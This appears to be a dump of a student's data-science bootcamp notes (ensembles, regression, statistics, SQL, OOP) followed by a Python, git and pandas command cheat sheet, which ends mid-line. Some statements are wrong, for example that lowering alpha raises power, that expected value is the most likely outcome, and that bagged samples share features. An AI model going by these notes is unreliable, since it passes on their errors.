Variance of a deep tree is high (since a second set of data produced from the same distribution will likely perform poorly); ie doesn't generalize well. Though bias is low for the training data (ie fits training data well)\n - Less deep trees have higher bias\n 3. Bagging: Bootstrap AGgregatING \n - growing a lot of trees and adding them together, which can serve to average away the variance (CLT)\n - Use bootstrapping such that trees grown will be slightly different (since data is slightly differet). Becaues otherwise, tree growing for a given set of data is deterministic, ie would make the same tree over and over.\n - Inherently paralellizable, can have multiple cores/computers building a set of trees\n - Recall that in each bootstrapped sample, 2/3 of the features are shared between the different trees grown from different boostrapped samples.\n - Out of bag error: side-effect of building model from boostrapped sample is that you have 1/3 of the data not used for each bootstrapped sample that can be used for test-error estimation (ie an inherent validation set).\n - Can use the 1/3 data and evaluate them using the trees not grown from that boostrapped sample.\n 4. Random Forests:\n - BUILDS ON BAGGING: so you still take bootstrapped samples of the data (typically the same number of samples as the original data set).\n - At each split, consider a random selection of m predictors at each split, in each tree. Typically n = sqrt(p). Ultimately tune p this with cross validation.\n - Leads to decorrelation of the trees, which leads to improved performance over bagging. \n - BIG IMPROVEMENT>>>> THIS Serves to decrease variance of the total model.\n - RF Bias Variance SSS4\n - As you build more trees in RF, bias stabilizes and variance asymptotically declines. Thus it is better to build as many trees as possible. The real limitation is computational time. And there is ultimtely a point beyond which growing more trees is essentially futile. So test for this via CV.\n A. Feature Importance\n - How to determine?\n - Frequency of use as a split feature?\n - Record total amount of RSS decrease (or Gini index) for a given predictor averaged over all B trees. Larger value indicates importance.\n - To evaluate the importance of the jth variable, record OOB accuracy of the model. Then shuffle (permute) all values of the jth variable across all the samples. Re-compute the accuracy. The lower it gets, the more important the jth variable was. Repeat for each var and rank the importance of the var.\n - Other ways (Sklearn methods): higher in the tree, or the expected fraction of data points that reach a node are both surrogates\n B. Bias Variance Tradeoff\n - Since variance is proportional to pairwise correlation p, and inversely proportional to the average of B-trees made in a RF, the RF procedure serves to decrease variance by averaging over B trees. p goes down and B goes up.\n - Variance RF = p * six^2 + ((1-p)/B) * sig^2\n - Information Gain SSS3\n - SSS6 Bias Variance Tradeoff\n - Averaging over many RF trees serves to decrease variance of the model.\n C. Tuning\n - Hyperparameter: parameter set ahead of time, what the structure of the model is. It is not learned by the model to achieve best fit. Often choose them via cross validation.\n - hyperparameter in RF is m, describing how many features are (radomly) available at each node when building each tree of the RF.\n - Select via CV\n - You can test several hyperparameters via CV, but RF has very many ~14, so adding each becomes more complicated. So likely need to decide some using heuristics like: for classification m= sqrt(p) or regression m= p/3.\n - Note that tree depth (another hyperparameter for RF), if too deep, RF can overfit.\n - Can use Feature Importance techniques above to try to select features of greatest importance to include when building trees. Becomes an issue if m is small, then this leads to decorrelated trees (good for low variance), but if unimportant variables >> important variables, model will not learn. Again, reinforces why important to tune m via CV which should identify this.\n - Seems like the above also seems to be augmented if number of trees grown is low relative to number of features.\n D. Other Issues\n - Can weight predictor classes using a user-specified loss matrix. Ie certain pieces of information are more important or prefer to err on false positive etc.\n - Missing data: many ways to deal with it. But consider setting to nonsensical value so you don't include \"false\" data in model.\n - Note, can use cross-validation to determine best way to deal with missing data from several candidate methods\n - Random forest lends itself for running on paralell computers or cores on a computer. Sequential tree methods such as Gradient Boosting or AdaBoost can not take advantage of paralel processing.\n\n\n160620 NonParametric Learners\n 1. K Nearest Neighbors\n - Sort the training points x by increasing distance from new point\n - predict the majority label of the k closest points; select k as a hyperparameter based on experimentation or prior knowledge.\n - if k is too small, tend to be overfit (model doens't generalize well), if k is too large, will be insensitive. the extreme case is that if you use the entire population n as k, you will always predict the majority class\n - general rule, can start with k = sqrt(n)\n - important to SCALE features, since we're calculating the distance between the features, we need to have them on the same scale, otherwise, that with the higher range will dominate the distance equation, making the other feature irrelevant.\n - Can implement weighted voting, where closer points are weighted more\n 2. Problems\n - The curse of dimensionality: knn works well for lower dimensional spaces, but as d>5, becomes more problematic. Becuase the nearest \"neighbor\" become far away in many dimensions.\n - Predicting can be slow\n - Difficulty with imbalanced classes\n - Can consider weighting or sampling schemes to counteract this. Ie in a fraud detection case where you have 0.1% of the sample as fraud instances, and the rest are valid instances, you can downsample (randomly) the valid cases when training your model.\n - categorical features don't work well\n 3. Decision Trees\n - Calculate the entropy of the dataset at the root node, \"before the first split.\"\n - Perform a split of the data on every available feature (x), and calculate the entropy before and after. The Information Gain is entropy before - after. Then choose a split based on the highest information gain.\n - H(S) \"entropy\" = - Sum of probability(S) * log 2 probability(S)\n - Information gain = H(S) - sum\n - This method is top-down and greedy, making a decision based on the best information available at the time.\n - note that the \"greedy\" quality may mean that you do not make the decision that optimizes the overall performance. Will not revisit split decisions.\n - Gini index: another splitting measure similar to the entropy equation.\n - sum(probability(S)(1-probability(S))\n - The misclassification rate is also available in sklearn, but has a linear slope up to the maximum of 0.5, so in practice does not work as well as gini or entropy.\n 4. Pros cons\n - The tree will fit every single observation, so it will have a tendency to overfit the data\n - Prune the true to address overfitting (in sklearn): min leaf size, max depth, purity (data points of the same class), gain threshold\n - if you use decision trees, you must prune the model; though practically speaking, we use ensemble tree methods (random forests) so pruning is not really necessary\n - Pros: low bias, simple to understand/interpret, nonparametric and non-linear, computationally easy to predict, deals with irrelevant features, works with mixed features\n - Cons: High variance, computationally expensive to train, greedy algorithm\n 5. Cost Complexity pruning\n - Since decision trees will tend to overfit, a way to avoid this is to prune back the tree. One way is by cost-complexity pruning, which selects a tuning parameter alpha penalizing the subtree's complexity and fit to the training data.\n - Often, select alpha via cross validation, comparing the mean squared prediction error via cross validation for each alpha. Pick the alpha to minimize average error.\n - Then return the sub-tree for the chosen alpha.\n 6. Both CLASSIFICATION tree and REGRESSION trees can be built.\n - The RSS is used as a measure of \"information gain\" with each split of a regression tree (continuous outcome).\n - the Gini Index or \"Cross entropy\" equations are used for classification trees, whcih basically classify the error rate before and after a given split (correlating with information gain), therefore allowing decision on what is the most \"informative\" split at a given node.\n - Tree methods can outperform linear regression when there is a highly non-linear and complex relationship between the features and the response.\n\n\n160617 Gradient Descent\n 1. Optimization\n - Find the min or max of a function: maximize likelihood or minimize square distance\n - Machine learning methods rely on optimizing a \"cost function\". Cost functions are the mathematical definition of your machine learning goal.\n - Intuition for gradient descent: If you take a guess and pick a point on the curve. You can calculate the derivative of the function from that point ( or the derivative as suggested by picking two close-points), you can then see the direction of the derivative. Depending on if you're maximizing/minimizing the function, you move in the respective direction based on the derivative, check it again at the next point until your derivative is near zero (which represents a maxima or minima).\n - The \"gradient\" is defined as the sum of the partial derivative of multiple variables. This is actually what you calculate in the above scenario for multiple variables.\n - the gradient points in the direction of steepest ascent\n - the gradient is in the direction of the steepest ascent. The gradient points upward, so we descend down the gradient\n - in gradient descent, follow the line of the steepest descent on the cost surface to find the minimum\n - Per iteration through features of the model, you update the parameters simultaneously with respect to that gradient. In other words, you calculate the gradient once per iteration.\n - NB: Gradient descent does not work with LASSO, since not differentiable given absolute value cost function\n - Requires differentiable and convex cost function\n - Only finds global optimum on globally convex functions\n - Convergence asymptotically\n - Choices of convergence criteria: max number of iterations, change in cost function, magnitude of gradient\n - Performs poorly without feature scaling. Since if higher varaince for some variables, may take extra time. Can scale features back once optimization is performed\n 2. Stochastic Gradient Descent\n - Use a subset of data\n - SGD computes cost function using a single, different randomly chosen observation per iteration. On average, it achieves the same as GD, but may have more variability\n - SGD actually converge faster on average than batch GD, can oscillate around the optimum\n - SGD generally requires less memory and computation and is faster, so is generally preferred. \n\n\n160616 Logistic Regression\n 1. Accuracy is the percent of observations correctly classified (TP+TN)/n\n - However, imbalanced classes will inflate accuracy\n - Doesn't reveal what kind of errors are being made.\n - Precision: True positives over those who were classified as positive.\n - F1 score (or F beta score) is a weighted harmonic mean of precision and recall. Rewards balanced precision and recall, rather than if it is unbalanced (if one is higher than the other).\n - ROC Curve, plotting true positive rate and false positive rate.\n - Area under the curve.\n - SSS5 Classifier Metrics\n -SSS15 ROC Curve Sensitivity and Specificity\n\n\n\n160615 Cross Validation Regularized regression\n 1. Bias variance tradeoff\n - A biased model centers around the incorrect solution. Bias can result from underfitting or from collecitng data poorly\n - High variance in the model can be caused by overfitting or by insufficient data\n - A model's expected squared prediction error will depend on the variability of y, and the variability of the training set used to train our model.\n 2. Cross Validation : helps to choose the best model that performs well on unseen data\n - Split data into training and validation sets\n - We use cross valiation in order to get a sense of the error. However, build the final model on all of the data.\n - Leave one out cross validation: build n models on n-1 data points and calculate MSE on 1 remaining data point. Computationally expensive and high variance since the tests are so small. So large variance in the error.\n - Medium between LOOCV and 1 fold CV is k-fold CV, below.\n - Use training set to train several models of varying complexity\n - Then evaluate each model using the validation set: R2, MSE, accuracy etc.\n - Keep the model that performs the best over the validation set\n - As you increase complexity of the model, MSE of the training data will go to zero.\n - but this will also increase the MSE of the test data.\n - So you want to choose the optimal model complexity that optimizes test MSE, while maintaining the most parsimonious model.\n 3. k-fold Cross Validation:\n - Randomize data set into k groups, train using k-1 folds.\n - Validate using the left out fold and record the validation metric for each validation such as RSS or accuracy\n - Average the validation results.\n - By increasing the number of folds, you decrease the variability of the mean squared prediction error of the model by averaging over the folds.\n * SO PRACTICALLY SPEAKING we often use cross-validation during model BUILDING: to optimize hyperparameters such as lambda in LASSO or Ridge, or to compare different versions of models. Once the model is built, we often FIT the model to the entire TRAINING data set, to fit the coefficients, and then compare performance on the TEST data set.\n 4. To prevent model fitting due to too many features:\n - Metrics to compare models\n 1. R squared is 1 - (MSS/TSS), 0 = awful, 1= awesome.\n - R2 essentially is the ratio of the sum of squared errors for the fitted model versus the null model with the null model predicting the average of the target (true) value, regardless of predictors.\n - However R2 will increase as you increase parameters, making it a poor comparator between different models.\n - R squared increases as you increase predictors, so can't really be used to compare between models.\n 2. Adjusted R2 penalizes for number of predictors, making it a better comparator of accuracy between models. (n-1) / (n-p-1)\n - However Adjusted R2 tends to under-penalize complexity\n 3. Information Theoretic Approaches: AIC, BIC\n 4. Test, training set. Compare test set error between models.\n 5. Cross validation. Average test error across all k-folds, and compare this between models of interest.\n - Cross validation makes no parametric or theoretic assumptions\n - Given enough data, can be highly accurate. is conceptually simple.\n - Cons: can be computationally intensive, if fold size is low, can be conservatively biased.\n\n\n\n - Subset selection:\n - Best subset: try every model combination and pick the best model (computationally intensive)\n - Stepwise: iteratively pick predictors to be in and out of model.\n Forward/backward stepwise selection.\n - Test between model candidate built by stepwise: AIC, BIC, Adjusted R2, Mallows C. Or can use CROSS VALIDATION\n - Better NOT TO USE RSS or R2.\n - Mallows Cp: Increases penalty for each parameter included. So needs to reduce the RSS faster than the penalty term\n - AIC, BIC, Adjusted R2 have similar rationale as Mallows Cp.\n - AIC/BIC are available across the gamut of parametric models, so these are the more common methods to use to choose a model.\n - These can be thought of alternatives to cross-validation to pick the best performing model. Cross validation can be performed on any model, whereas AIC/BIC may not be available for some models.\n - Regularization - TBD\n - Dimensionality Reduction - TBD\n 5. Regularized Linear Regression\n - Shortcomings of OLS\n - In high dimensions, data is usually sparse : the curse of dimensionality\n - Linear regression can have high variance (ie tend to overfit) on high dimensional data\n ** This leads to the desire to want to restrict or normalize or regularize the model so that it has less variance **\n 6. RIDGE REGRESSION - \"L2 norm\"\n - So regularization adds a penalty term that penalizes larger values of beta (penalizes large values more than small values of beta)\n - penalty is in proportion to the square of the beta coefficient, hence \"L2\" normalizing factor.\n - lambda is the penalty applied to the coefficients\n - higher the lambda the more the \"bias\" of the model. Labda = 0 is no different from standard linear regression.\n - notably, all variables need to be normalized, since lambda will apply penalty (large values of the coefficient) proportional to its scale. So variables must be normalized.\n - changes in lambda changes the amount that large coefficients are penalized\n - increasing lambda increases the model's bias and decreases variance\n - Use cross-validation to identify the ideal lambda that decreases the error of the model.\n 7. LASSO - \"L1 norm\"\n - Instead of the penalizing the square of the coefficient, you penalize the absolute value of the coefficient, which has the benefit of driving some coefficients to zero (rather than near zero with Ridge)\n - Tends to set coefficients exactly equal to zero\n - Automatic feature selection, leads to sparse models\n - Ridge is computationally easier because it is differentiable\n - True sparse models benefit from lasso, dense models benefit from ridge\n - Even in a situation where you might benefit from L1's sparsity in order to do feature selection, using L2 on the remaining variables is likely to give better results than L1 by itself.\n 8. So use cross-validation to select lambda which optimizes error for either LASSO or Ridge \n - Range of lambda (alpha in SKlearn) is 0 to infinity.\n - A lambda of zero in LASSO is identical to linear regression\n\n\n\n\n160614 Linear regression\n 1. Parametric model\n - Assumptions are strong, but so are conclusions. Models are simple, interpretable and flexible.\n - y hat indicates prediction of Y based on X=x\n - RSS grows with n, not by itself interpretable.\n - R2 proportion of variance explained by the model\n - R2 increases with features included into the model.\n - As you increase features, you risk overfitting data\n - Overfitting is learnign the data's signal and the noise, limiting generalizabiility to additional nonobserved data.\n - F test can be used to compare a model with another nested model\n - If model with missing predictor/s don't matter for prediction, F statistic will be small\n - You get a probability of F statistic which \"MAYBE\" can be interpreted as the p-value for the entire model??\n - If you have covariates that are not significant by p-value, remember that you may have correlation between coefficients and that interpretation of the meaning of the coefficients may be difficult.\n 2. Assumptions of a linear regression:\n 1. Linear relationship between predictors and outcome\n 2. Errors (residuals between predicted and true) are independent and identically distributed. And in time series, there is no correlation between consecutive errors.\n 3. Constant variance of errors, aka homoscedasticity. Ie errors don't change over time, versus the predictions or versus any independent variable.\n 4. Normality of the error distribution\n\n 3. Troubleshooting.\n 1. Multicolinearity: If two or more predictor variables are highly correlated with each other, the uncertainty in model coefficients becomes large. Affects the interpretability of coefficients\n - Can use a correlation matrix to look for pairwise correlations.\n - use VIF (variance inflation factors) for more complicated relationships. To try to figure out whcih variables are colinear\n - Run OLS for each predictor as a function of all other predictors. K times for k predictors.\n - Benefit is that it looks at all predictors together.\n - Rule of Thumb is >10 is problematic\n - remove (but make note of) any predictor that is easily determined by the remaining predictors.\n 2. Outliers: When y is far from predicted y hat. Least Squares is particularly affected by outliers.\n - Residual plots can help identify outliers.\n - Influence plots can distinguish outliers from high leverage points.\n 3. Heteroscedasticity: the existence of more than one population of variability/variance. Ie residuals do not have constant variance.\n - Can test by plotting the residuals\n - If heteroscedasticity is present, can invalidate the assumption that modeling errors are uncorrelated and uniform. \n - Solution may be to transform Y, ie log transformation of Y, or sqrt(y).\n 4. Normality of Residuals: Linear regression operates under the assumption that residuals are normally distributed\n - Can check this assumption with a QQ plot.\n - If residuals are not normal, may transform the response.\n 5. Non-linearity relationship between outcome and predictors.\n - Can consider adding a squared version of the predictor.\n - same as adding a higher order polynomial of a predictor to the feature space. Ie adding x^2 or x^4\n - Also spline, polynomial, step function, local regression, generalized additive models. \n - Can capture nonlinear aspects of the relationship between parameters and y using the above methods: spline, polynomial etc\n - Can also transform the y feature space to try to address this.\n 6. Mean Squared Error is proportional to Residual sum of squares. In fact it is RSS divided by sample size n.\n\n\n\n\n\n160613\nLinear Algebra\n 1. matrix multiplication\n - For the given row-column target in the matrix, sum of mulitply the elements of matrix1 row times matrix2 column.\n 2.\n - Only square matrices are invertable\n - Eigenvectors/eigenvalues are values that do not change except for by a scalar through a transformation\n - A stochastic matrix represents the probabilty of goig from one state to another. \n - Axis zero is column-wise, axis 1 is row-wise in numpy (opposite in pandas)\n 3. Exploratory Data Analysis\n - Look at the distribution of individual features\n - Then look at bivariate plots\n - ie scatter with kernal density plots\n - pandas scatter matrix\n 4. Linear regression\n - Cost function: usually is ordinary least squares. So you minmize the residual sum of squares. Minimizing the cost function in linear regression.\n - The error term or the \"residual\" is the difference between predictions and is assumed to be iid, and normally distributed with N( mean = 0 and variance).\n - Reliability of linear regression\n - R squared, coefficient of determination. Compares your model versus a model that is just the mean. A high R squared on its own does not imply a good model.\n - If features are correlated, this breaks the assumption that features are independent and errors are iid so this can affect validiy of the model.\n - F test compares model with null model. Shortcoming is that it doesnt' tell you which beta is unequal to zero.\n - Can perform hypothesis test on coefficient\n\n\n\n160610\nMultiarmed bandit\n 1. Conjugate Prior \n 1. Conjugate Prior: Posterior is proportional to the likelihood x prior\n 2. We use probability distributions (which integrate to 1) to model both the posterior and the prior in the Bayes Theorem equation.\n - The beta distribution is a known distribution that we will be using to model the PRIOR event for an event that has a likelihood of a binomial distribution.\n - We model the POSTERIOR distribution with the binomial distribution usually.\n 3. Assumptions of the conjugate prior method are the same as for the binomial distribution: one of which is that the probability is Constant\n 4. For the beta distribution, the alpha parameter is the number of conversions you had, the beta is the number of non-conversions (using the CTR example for a website A/B test)\n 2. Traditional A/B testing\n 1. Epsilon first testing: explore first for x tests, then use results\n - Pitfalls include: only after a set time, do you use data and pick the better performer, potentially losing money\n 3. Multi-Armed Bandit\n 1. Strategies to optimize exploration and exploitation, leraning as you go and making changes to behavior.\n 2. Method of adaptive, reinforcement learning.\n 3. Goal is to maximize return and minimize \"regret\" or using the sub-optimal option.\n 4. Strategies\n 1. Epsilon Greedy: Explore with some probability epsilon, often 10%\n - All other times we will exploit the option with the best performance\n -After we choose a given bandit, update the performance based on the result.\n 2. Upper Confidence Bound UCB1\n Choose which ever bandit has the largest value, zero regret algorithm\n 3. Softmax\n - choose a bandit randomly in proportion to its estimated valu. Tau is a parameter that controls the randomness of the choice\n - pA is the percentage of people who convert on site A\n 4. Bayesian Bandit\n - Modeling each of the bandits with a beta distribution with the shape parameters of alpha = won, beta = lost\n - Then take a random sample from each bandit's distribution and choose the bandit with the highest value. Update with each new trial\n\n\n\n\n\n\n\n\n\n\n160609\nStatistical Power\n\n 1. power\n 1. Def: Probability of rejecting the null hypothesis given that the alternative hypothesis is True\n 2. How to improve power?\n - One way to improve the power of the test is to increase sample size, so the distribution under the presumed alternative hypothesis has less variation and thus the area to the right of the dotted line (alpha) is higher.\n - Less variable data\n - Change alpha (lower it)\n - A larger effect size (that you want to be able to detect with your experiment) would also increase the power of the test. Though experimentally a larger effect size is harder to achieve, ie it requires a higher burden of proof\n\n\n160608\nHypothesis Testing\n\n 1. Bootstrap: As long as your original sample is REPRESENTATIVE of the population, because the number of permutations of combinations of subsequent combinations (Drawn with replacement) of the samples in your bootstrap (n to the n, if n = size of original sample) is so large, the summary statistics of random variables will follow normal distribution.\n A. So you can use bootstrapping to empirically estimate confidence intervals for the summary statistic from your bootstrap sample\n B. So bootstrapping does not always narrow the confidence interval of the summary statistic, it can provide a confidence interval for statistics that don't have CLT to provide a 95CI. \n 1. ie \" it is available regardless of how complicated the estimator is\". Since bootstrapping \"estimates the sampling distribution of an estimator by sampling with replacement from the original sample\"\n 2. Used to estimate the standard errors and confidence intervals of an unknown population parameter\n 2. Hypothesis Testing\n 1. Type 2 error, loss of opportunity error, fail to reject H0 when it is false\n 3. Chi square\n 1. Chi Square Goodness of Fit: Used to compare the sample data of a categorical variable to the theoretical distribution. Observed minus expected\n 2. Chi Square Test of Independence: Compare two categorical variables under the assumption that they are independent \n\n\n\n160607\nSampling and Estimation\n\n 1. Parametric vs Non Parametric\n A. Parametric based on assmptions about the distribution of the underlying population, that that there are parameters that define that distribution\n - If data deviates from these assumptions than a parametric procedure can lead to incorrect conclusions\n B. Nonparametric: does not make distributional assumptions about he shape or parameters of the underlying distribution\n - If base assumptions hold, parametric approaches can lead to more precise estimations\n - Usually based on ranking, does not take into account distribution of data\n - Less power than corresponding parametric procedure\n - Interpretation can be more difficult than parametric measure\n 2. Maximum Likelihood Estimators\n A. The join distribution is the product of the individual probabilty distributions, this is ASSUMING that events are indepdent and identically distributed (IID)\n - Maximizing the likelihood function is the same as maximizing the log lilelihood function which simplifies complications, since the product of function is the same as the sum of the logs of the function. So calculation is simplified.\n - So derivative with respect to the parameter (partial derivative) is how you solve for this\n 3. Maximum a Posteriori -MAP\n A. Baysean suggests that the parameters from come a distribution themselves. Assume a prior distribution of the parameters g over theta, given the value x.\n 4. Kernal Density estimations\n A. Drawn from a distribution with an unknown density f, but which you are interested in estimating the shape of its function. Essentially a data smoothing problem.\n B. Uses a kernel K(.): which is a nonnegative function that integrates to one and has a mean of zero\n c. h is a smoothing parameter, called a bandwidth, which determines the width of the bins over which the kernel is deployed.\n D. Related to histograms, but can be made smooth by using a suitable kernel. Sum of kernals, can be thought of as summing kernels\n\n\n\n\n160606\nProbability\n- Probability Mass Function PMF: For a DISCRETE random variables X that takes discrete values, give the probability of an individual event.\n- Probability Density Function PDF (\"CDF\" in scipy stats modules): For CONTINUOUS random variables, gives probability of having value less/greater than a given value.\n\n- disjoin is mutually exclusive\n- upside down A is “all\"\n- Combinatorics\n - Factorial is the all the possible orderings in a set of items n\n - Permutations, selecting subgroups of a set when order matters\n - nPk = n! / (n - k)!\n - Combination: number of was of selecting subgroups when order doesn’t matter\n - nCk = n! / (n-k)!k!\n - Note that you’re dividing out the number of orders (factorial k) in the number of the set chosen\n - Sample space contains the exhausted list of mutually exclusive simple events\n - An event A contains a subset of the simple events in S\n - Conditional Probability: probability given something already occurred. Reduces the sample space to the probability of what happened (what is given)\n- Random Variable\n - Exepected Value: is the most likely outcome of a random variable\n - For discrete random variable, sum over the sample space; for continuous, need to integrate over sample space\n - Variance: measure of the spread of values around the mean; squaring this is how to make it positive (one method only of several), but the units are squared, so make it harder to interpret\n - Standard deviation is the square root of Variance, with units back to original variable\n - Covariance: how two variables vary in relation to each other. Ranges from negative to positive infinity. So the covariance re-scaled ranges from neg 1 to 1.\n\n- DISCRETE DISTRIBUTIONS\n- Bernoulli distribution: two outcomes, success failure\n - Constant Probability of success, events are independent\n- Binomail models the sum of the Bernoulli random variable; so the number of successes in n trials\n - probabiltiy is the product of the independent Bernouli random variables, since each is independent\n- Geometric distribution also builds on Bernouli, models the number of trials to first success\n- Poisson, models nubmer of events/successes in a period of time (or space)\n - lambda is an average rate of success in that time or space\n - Good for counting processes\n\n- CONTINUOUS DISTRIBUTIONS\n- Uniform: equally likely events within a set interval\n- Exponential: models time between Poisson events\n\n160603\nSQL Python\n\n- psycopg library to interface to a Postgres database from within Python\n - There are Python libraries to connect to almost any database you want, mysql-connector-python, sqlite, pymongo\n- Cursor is a control structure to fetch data and handle transactions with the SQL database\n - The results from a cursor object can only be accessed once, since it is returned as a generator. So need to dump it into a datastructure in Python you can use later\n - Generally will use cur.fetchall() into a python object to use the results of your query\n - Can also use: cur.fetchone() #next result, cur.fetchmany(n) #returns next n results (in case you need to batch the storage of your results)\n - Or: for res in cur: #iterates over results in the cursor\n- Enter SQL postgress query as a multiline string in python: query = ‘’’ ‘''\n\n- If you execute a query in psycopg2 and there is a mistake in your query, you can’t interact with the cursor again (ie send a fixed query) until you rollback the connection: conn.rollback()\n- To open a connection in psycopg2:\n - import psycopg2\n - conn = psycopg2.connect(dbname=‘{name}’, user=‘[username]’, host=‘[hostname])\n- Write queries in python using: c.execute(‘’’ SQL QUERY ‘’')\n- Changes to the database made using your query are NOT stored until you commit them using\n - conn.commit()\n - curr.close()\n - conn.close() #good practice to close the connection at the end of your python program\n- conn.rollback() # if you make a mistake on the query, use rollback to restart the transaction.\n- To create a new DATABASE in python through psycopg2, you need to turn on auto-commit in order to execute the command. Be sure to close the connection and restart a new one with auto-commit off, so you don’t accidentally change the database with a subsequent query that you can’t roll back.\n - conn.set_session(autocommit = True )\n - cur = conn.cursor()\n - cur.execute(‘CREATE DATABASE <database name>’)\n - curr.close()\n - conn.close()\n- COPY <into table name> FROM ‘filepath of data file ie csv’ DELIMITER ‘,’ CSV; #import data into table from external file.\n\n160602\nSQL\n\n- RDBMS data is one way to store persistent data\n - Data that is infrequently accessed and unlikely to be changed\n - Composed of tables, columns rows\n - Column contains a certain data type\n - Row is an observation that holds values for each of the columns\n - Tables are specified by a schema that defines the structure of the data\n- Advanced SQL\n - Self-join-effectively joining a table with itself, in order to filter more powerfully. Used commonly.\n - A With function in SQL, you can alias a query, then use than in a larger query\n - Window functions is signified OVER ( PARTITION BY ) , and allows a calculation over a set of table row within a query\n\n160601\nObject Oriented Programming\n\n- A class is a blueprint of an object that can be created from that class, works generically across different cases. Ie a dictionary is a class in python\n- An object is an instance of a class, can create multiple instances of the same class\n- An attribute is a property of the class, usually a variable\n- OO revolves around three concepts\n - Encapsulation - interact with internals of an object only through method calls, rather than directly\n - attributes of the object are essentially the data stored in the object (instance of the class), but only alter/update them through methods\n - Inheritance - Derive a child class from a base class. Base class defines general behavior. Child class specializes behavior.\n - Polymorphism - Objects of the same base class will often support the same interface, having the same/similar attributes or methods\n- “self” refers to an instance’s own unique data. When you assign a class to a variable, that variable subsequently then gets passed to every method of that class-instance as the first argument. So every method in that class must have a “self” argument in the list\n- __init__ is the first method called in a class that is called whenever the class is created. Use self to refer to the instance’s member data and functions\n- *args will pass a list sequentially to a function\n- ** kwargs are keyword-named arguments that are stored in a dictionary and can be passed to a function, either as a dictionary or as individual named key-word arguments. preceeded by ** (packing and unpacking)\n- A static method is a function in a class that is not passed the reference the instance of the class. So it’ll just do that it says, regardless of the rest of the class functions\n- Magic methods: predefined methods within python that can be defined for your class, such as length or str(stringmethod)\n - repr is the python representation of the object\n - str is the string representation of the object\n - init is the constructor magic method required to initialize a class\n- An Abstract Base Class defines a standard interface for derived object. So it allows you to define a common set of methods for a class-type, essentially enforcing polymorphism\n - Ie for any regression, they offer a certain types of methods. So define ABC first, then individual classes from this later\n- Decorators: functions which wrap other functions\n- Python Debugger is a good way to debug clode\n - insert “import pdb” in line in the code,\n - “import pdb; pdb.set_trace\n - type n for new line, c for new trace point, q to quit, s steps through news line stepping through functions\n - can access anything at that python runtime, paused at the given line\n\n160531\n\n- Programming\n - Generators in Python\n - Take less memory\n - Use enumerate when you need the index of the list as well as the value\n - If possible, try to see if you can use hashing to organize/loop over data, as this is the fastest way to perform such functions\n - Mutable objects can change their value but keep their id()\n - lists, sets, dictionaries\n - Only immutable objects can be used as key in dictionary (“unhashable”)\n - Immutables: int, string, tuple, floats\n" }, { "alpha_fraction": 0.704182505607605, "alphanum_fraction": 0.7185418605804443, "avg_line_length": 47.99122619628906, "blob_id": "3a2477252047028bcb514b4e61dfb0eddb464fe3", "content_id": "600c4306ac2e03022591cfcb7265277b2450263f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 27932, "license_type": "no_license", "max_line_length": 673, "num_lines": 570, "path": "/160601 Python Commands.md", "repo_name": "geoffisdancing/galnotes", "src_encoding": "UTF-8", "text": "\n```python\n#Python General commands\n\n if __name__ == '__main__': #base code that will run when file is run by calling it by name\n from __future__ import division\n\n f = open(filename) #open filename\n with open(filename) as f: #open file, prefer to use this over open(filename), so it automatically closes the file\n\n class ClassName(object): #way to implement a class ClassName\n def __init__(self, selfvar1, selfvar2, function1, etc)\n self.selfvar1 = selfvar1\n\n from collections import Counter #imports Counter \"container\" serves to count the most common items in a list/array \n Counter(array_lst_object).most_common(num_of_most_common_items) #returns a list with a tuple of the most common item and its count\n\n if not os.path.exists(\"./<dirname>\"): #to make a directory if doesn't exist using python\n os.makedirs(\"./<dirname>\")\n\n with open('URL here', 'r') as f: #read URL location as file,\n shoes = f.read().replace('\\n','') #reading it in as html for parsing using BS (see PyMongo below)\n\n import requests #ability to make GET request for web scraping\n r = requests.get('http://www.ebay.com/.....complete URL here ')\n soup2 = BeautifulSoup(r.content, 'html.parser')\n\n from collections import defaultdict\n from time import time #gives runtime, call with \"print time()\"\n\n %time #ipython's magic method\n\n from collections import Counter\n d = Counter(lst)\n\n assign = _ #assigns var to the last output returned in the console\n '-'.join(<sequence of strings>)\n float('NaN') #used to assign variable value to NaN\n\n import pdb; pdb.set_trace()\n\n\n# Terminal/Bash\n mkdir\n cp\n mv\n rm\n rmdir\n man #bash manual\n ctr + a #move to front\n ctr + e #move to end\n ctr + k #clears line after the cursor\n ctr + u #clear current line\n ctr + l or clear #clears terminal screen\n !$ #last argument \n ls -l #one item per line ls detailed\n echo $PATH #Bash searches for commands, system variable separated by colons\n searches in ~/.bash_profile\n # separate commands in batch using semicolon, or & to run concurrently\n\n\n# Git\n git clone http://xxx\n git status #status of local git with cloud git\n git add . #add all thing in current directory and subdirectory\n git commit -m “comment\"\n git push\n git init #initializes directory as git repo on your local computer\n echo \"# galnotes\" >> README.md\n git init\n git add README.md\n git commit -m \"first commit\"\n git remote add origin https://github.com/geoffisdancing/galnotes.git\n git push -u origin master\n git branch # tells the git branch status of your current working directory\n git checkout master #switch to master branch from other branch, ie if you want to make a \"hotfix\" to master\n git merge hotfix #merge hotfix branch changes with master (ie master is your current branch location since you just checked it out)\n git branch -d <hotfixbranch> #can delete branch once you've merged it with master\n\n git pull origin master # syncs your local git repo with the origin (on http) pulling down new files\n git pull #also works, don’t necessarily need “origin master\"\n\n #to push files from local repo (recently just committed to one account) to a different git account:\n git remote -v #to get URL\n git remote add <temp name> <change to your git url>\n git push <temp name>\n\n # to fetch a specific file from a remote git URL\n git fetch {remote host url} #pulls branch information from the remote github host (ie from another computer), after which you can now do git checkout branch which may be from another computer/user\n git branch -a #after fetch, will show the other branches from master, from which you can then checkout one you want\n git checkout FETCH_HEAD -- '[filename]' # both of these above commands used in order to pull an individual file from a the remote master. Must use dir/filename if file is located in a subdirectory\n\n\n\n#PANDAS\n#axis = 1 indicates column in pandas\n\n%matplotlib inline # command in ipython to print graphs inline\nimport matplotlib.pyplot as plt #plotting functionality plt\n\npd.read_csv('filepath') # to read csv file into dataframe, assign to df name.\n# try date_parser=[col index] parameter to allow specification of a specific column to parse as a datetime.\npd.read_table('text_filepath') #read text file as df\npd.scatter_matrix(<dfname>, alpha = 0.2, figsize=(6,6),diagonal='kde'); #scatter matrix of dataframe variables in pandas\n\ndf = df.drop('column name', axis=1, inplace=True) # drops column in pandas dataframe, axis = 1 indicates column in pandas. default is axis = 0 which drops an observation (row) from the data\ndf.drop(df.index[[1,2,3]]) #drop rows of df, indices 1,2,3\ndf.pop('column name') #pops off column name from df, modifying df in place\ndf = df[df['Column name'] <some value] # index based on column value, syntax here effectively deleting by re-saving as df\ndf[['column 1', 'column 2']] #index multiple columns\ndf2 = 